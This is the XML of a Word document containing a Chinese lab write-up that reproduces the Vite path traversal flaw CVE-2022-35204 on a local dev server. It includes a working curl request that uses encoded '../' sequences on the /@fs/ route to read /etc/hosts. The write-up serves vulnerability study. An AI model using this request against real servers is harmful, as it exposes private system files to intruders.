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漏洞名称：Vite 路径遍历漏洞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编号：CNNVD-202208-3372</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE 编号：CVE-2022-35204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">厂商：Vite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漏洞类型：路径遍历</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">收录时间：2022-08-18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更新时间：2022-08-22 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vite 是 Vite 开源的一种新型的前端构建工具。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vite v2.9.13 之前版本存在安全漏洞，该漏洞源于允许攻击者通过精心设计的 URL 对受害者的服务执行目录遍历。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vite v2.9.12</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="41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CVE-2022-35204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vite@2.9.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">安装带有缺陷的 vite 版本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23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，简单写入任意 HTML 页面，如下样例。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http-equiv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"X-UA-Compatible"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Vite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There is nothing to observe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3"/>
    <w:bookmarkStart w:id="30" w:name="运行程序"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 运行程序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vite dev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">开启 vite 开发模式服务器，可以看到程序默认监听了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost:3000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">地址端口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4019550" cy="20288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/fi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访问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可以看到我们在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中编写的内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3619500" cy="16192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验证漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vite 默认启用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/@fs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">路由用于访问任意本地文件，但是只限于项目仓库目录下的文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">例如我们构造一个请求 URL 形如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/index.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，这个 URL 指向的是我们方才创建的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，并且在项目的目录下，因此可以正常访问。我们使用 curl 测试这个路径的访问情况。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http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">程序输出如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="180510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我们尝试访问一个不在项目路径下的文件，例如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文件，可以看到 vite 拒绝了我们的请求。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http://localhost:3000/@fs/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="129115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漏洞的关键在于，我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">（经过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">之后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">）来索引到父级目录，从而绕过 vite 的路径验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">值得注意的是使用 curl 必须要带上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--path-as-is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">参数，防止 curl 自己展开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../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curl --path-as-is http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="174306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figur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可以看到成功绕过了 vite 的路径检测，成功访问到了系统中的任意文件。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2023-05-29T01:03:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-29T01:03:40Z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